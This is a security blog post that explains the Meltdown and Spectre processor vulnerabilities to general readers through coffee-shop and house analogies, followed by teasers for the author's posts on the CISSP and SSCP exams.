Subscribe to this blog

Subscribe

The Spectre of Intel’s (Past) Meltdown

The Internet is abuzz with reports of two major vulnerabilities codenamed “Meltdown” & “Spectre”. These vulnerabilities were independently reported by security researchers at Cyberus Technology, Google, and the Graz University of Technology.

Thousands of articles have already been written over this. So what’s new in this blog post? I did read a lot of this information available on the internet before writing this article and found this:

a)Some of the articles contain highly technical information and jargon which doesn’t make sense for the common man.

b)Most of the articles do not explain what the real deal is and just touch upon the basics of good information security practices.

c)Leading press houses have taken this opportunity to thrash the tech companies on such vulnerabilities.

So if you just want to understand as to what “Meltdown” & “Spectre” mean in extremely simple terms … read on to find out.

The Speculation Problem

Do you have a favorite restaurant where you go or have been going for years? If yes, you would have appreciated the fact that the waiter knows “What’s your favorite?”

Or, Imagine the coffee shop where you step in every morning and the lady on the other side has your cappuccino ready with “Just the way you like it John” statement.

In both these scenarios, the waiter and the waitress have assumed or rather speculated as to what are you going to order basis your history.

Now let’s say that the coffee shop makes the coffee extra special for you by putting your name tag on the cup. Every day, you see your name on it and love it.

But one fine day, when you step into the shop, you order an expresso rather than a cappuccino. The shopkeeper is taken aback as he has the order ready, remember, with your name on it and just the way you like it. Now since you changed the order, he throws that cup in the dustbin and gives you an expresso.

Well, so far, so good. Are you wondering as to did I forget that this article is about “Meltdown” and not about coffee. Hey, hold your horses, the story is about to get better and I did not forget about “Meltdown”. When the shopkeeper throws the cup away the garbage collector is able to get your name off the cup even though if it’s just for a moment.

Still wondering as to how “Meltdown” fits in this story? Read on. Our computers work in a similar fashion. They use a technique known as “speculative execution” to perform certain processing operations before it is known for certain that those operations will be required, on the premise that these guesses often turn out to save time.

So when you give an instruction to open say MS Word, the computer speculates that you may click on “File” as your next step based on usage pattern. So based on this speculation, it sends this information to the processor for processing to save time. Modern computer chips have sophisticated “branch predictors” that use fancy algorithms to determine what your next step would be and they are correct 99% of the times.

Now when you open MS Word, instead of clicking on “File”, you decide to close the program altogether. However, the computer had speculated that you would click on “File”. Now basis this new instruction, it throws away the previous instruction.

This information which is thrown away can be hacked or spied upon by the hackers and this weakness which can be exploited is dubbed as "Meltdown" and "Spectre". They differ in the way this is done.

I want to meet the Kernel

There is a new villain in town and yes, it wants to meet the Kernel. Let’s understand as to who “Kernel” is.

He is the boss and only he decides as to who can meet him and others in the town. In computer terms, it is the core of a computer's operating system, with complete control over everything in the system. There are only a few processes who can speak directly with the kernel.

Now, let’s say, that this villain knows a secret about the kernel called the “Side- Channel”. To understand this “Side-channel” attack, consider that I follow you every day without even connecting with you. Basis this spy work, I am able to gather a lot of information about you and your habits.

“Meltdown” & “Spectre” are the villains in this case who know about the “Kernel” and his deeds. His deed being doing speculative execution of instructions and throwing away the “Unused” instruction in an unprotected space. This is what the security researchers have targeted. When Intel processors (affected by Meltdown) perform speculative execution, they don't fully segregate processes that are low-privilege and untrusted from the highest-privilege memory in the computer's kernel. That means a hacker can trick the processor into allowing unprivileged code to peek into the kernel's memory with speculative execution.

Let’s Call the Patch Guy

Well, can you change the “Kernel”? Unfortunately, the answer is NO. We need to understand that both “Meltdown” and “Spectre” are hardware bugs and not software bugs. It’s the way, modern processors were built.

Imagine that you built your house years back. Now you discover that there was an issue with the design of the house and that could allow a thief to enter into your house from the back door. Can you change the house design now? No. You need to redesign the house. In a similar fashion, the tech companies have to redesign the processors, Mr. Kernel, and the instruction processing.

Are you wondering as to what happened to the patches that were issued by the tech companies? Well, to understand it, let’s go back to the coffee analogy. Now since the shopkeeper knows that you have changed your behavior, what would he do? He asks his waiter to wait until you give the order.

In a similar fashion, the patches deployed by most of the companies have in a way “suspended” or “try to suspend” this speculation. The patch makes it difficult for the villain to “spy” as to what Mr. Kernel is doing.

I wish I had the answer to this question. We are dependent on Intel or AMD and the tech companies to issue us new patches which may temporarily fix the problem. But is it really that bad? Trust me, it’s not. While the threat is real, it will take a lot of time and effort for the bad guys to use it in the real sense. Remote code execution will not work for these vulnerabilities and it is not cost effective for the bad guys to spend so much time and energy on the personal computers.

Well, for nation-states and national security, it’s a different game altogether. Until that time, we can just keep our systems updated with the latest patches and implement best information security practices. Don’t look at me like this …yeah I mentioned it too.

In case you wanna know more about advisories issued, Meltdownattack.com has a full list of vendor advisories. The academic paper on Meltdown is here (PDF); the paper for Spectre can be found at this link (PDF). Cyberus Technology has their own blog post about the threats.

Do share your comments and feedback in the comments section below.

Reactions:

Get link

Facebook

Twitter

Pinterest

Email

Other Apps

Comments

You may also like to read...

You may read multiple posts on the various blogs and websites where you are given tips as to how to pass the exam in the first go, refer which books and solve which questions. In this blog post I’m not going to bombard you with those details. Instead, I’m going to share my journey and experience from preparing till passing the CISSP exam in the first attempt. What is CISSP? CISSP stands for Certified Information Systems Security Professional. Congratulations and all the very best to you, if you have decided to opt for the Gold Standard Certification. The exam is offered by ISC2 and contains around 250 questions. You have to book an appointment for the CISSP exam through the ISC2 website where you then redirected to a Pearson Vue website when you register for the exam. The exam costs around 599USD. Phase 1: Deciding It is very important for you to finalize which certification you want to do. Try to research the pros and cons of a certification. Do not just start preparing for a particular…

I wrote a blog post in the month of December where I detailed about the new CISSP CAT format being launched by the (ISC)2. The post gave details about the new exam – what would it be all about, what does the new exam mean for you and important points to consider. Well, since I had passed the exam way back in July, there was no way, I would decide to sit for this difficult exam again. Luckily, few of my friends gave the CISSP CAT exam and passed it, so I spoke to them to understand their experience with this new exam format and decided to write about it. So here it goes… The Study Material
The first question that comes to everyone’s mind is – Do I need to look for a new study material since the exam format has changed. The answer is NO. The CISSP study material remains the same. My friends referred to the following material, but this is not an exhaustive list in any way. My recommendation would be to stick to one particular book and get to know every word and line of it. It is extremel…

Systems Security Certified Practitioner (SSCP) exam is offered by (ISC)2. When I prepared for this exam, there was hardly any material for preparation or blog posts to help me understand the experience of this exam. In this blog post, I will try to explain to you how to study for this exam and the experience of this exam.
Before I begin, let me congratulate on your journey to becoming an SSCP. Although this certification may not be highly recognized as the CISSP certification, still it shows your employer and the world that you are really interested to pursue your career in this field. You become a practitioner in this field. What is SSCP?
You would like to read CISSP vs SSCP in case you want to have a comparison between the exams. SSCP is a 3-hour long examination having 125 questions. You are required to score a minimum of 700 out of 1000. 25 questions are not graded as they are research oriented questions. It is important to note that since these questions are not graded, you need …

Popular Posts

You may read multiple posts on the various blogs and websites where you are given tips as to how to pass the exam in the first go, refer which books and solve which questions. In this blog post I’m not going to bombard you with those details. Instead, I’m going to share my journey and experience from preparing till passing the CISSP exam in the first attempt. What is CISSP? CISSP stands for Certified Information Systems Security Professional. Congratulations and all the very best to you, if you have decided to opt for the Gold Standard Certification. The exam is offered by ISC2 and contains around 250 questions. You have to book an appointment for the CISSP exam through the ISC2 website where you then redirected to a Pearson Vue website when you register for the exam. The exam costs around 599USD. Phase 1: Deciding It is very important for you to finalize which certification you want to do. Try to research the pros and cons of a certification. Do not just start preparing for a particular…

I wrote a blog post in the month of December where I detailed about the new CISSP CAT format being launched by the (ISC)2. The post gave details about the new exam – what would it be all about, what does the new exam mean for you and important points to consider. Well, since I had passed the exam way back in July, there was no way, I would decide to sit for this difficult exam again. Luckily, few of my friends gave the CISSP CAT exam and passed it, so I spoke to them to understand their experience with this new exam format and decided to write about it. So here it goes… The Study Material
The first question that comes to everyone’s mind is – Do I need to look for a new study material since the exam format has changed. The answer is NO. The CISSP study material remains the same. My friends referred to the following material, but this is not an exhaustive list in any way. My recommendation would be to stick to one particular book and get to know every word and line of it. It is extremel…

Systems Security Certified Practitioner (SSCP) exam is offered by (ISC)2. When I prepared for this exam, there was hardly any material for preparation or blog posts to help me understand the experience of this exam. In this blog post, I will try to explain to you how to study for this exam and the experience of this exam.
Before I begin, let me congratulate on your journey to becoming an SSCP. Although this certification may not be highly recognized as the CISSP certification, still it shows your employer and the world that you are really interested to pursue your career in this field. You become a practitioner in this field. What is SSCP?
You would like to read CISSP vs SSCP in case you want to have a comparison between the exams. SSCP is a 3-hour long examination having 125 questions. You are required to score a minimum of 700 out of 1000. 25 questions are not graded as they are research oriented questions. It is important to note that since these questions are not graded, you need …

Disclaimer:

The views and opinions expressed herein are my own. They do NOT intend to represent the views or opinions of my employer or any other organization. Any information represented as fact are believed by me to be true, but I make no legal claim as to their certainty.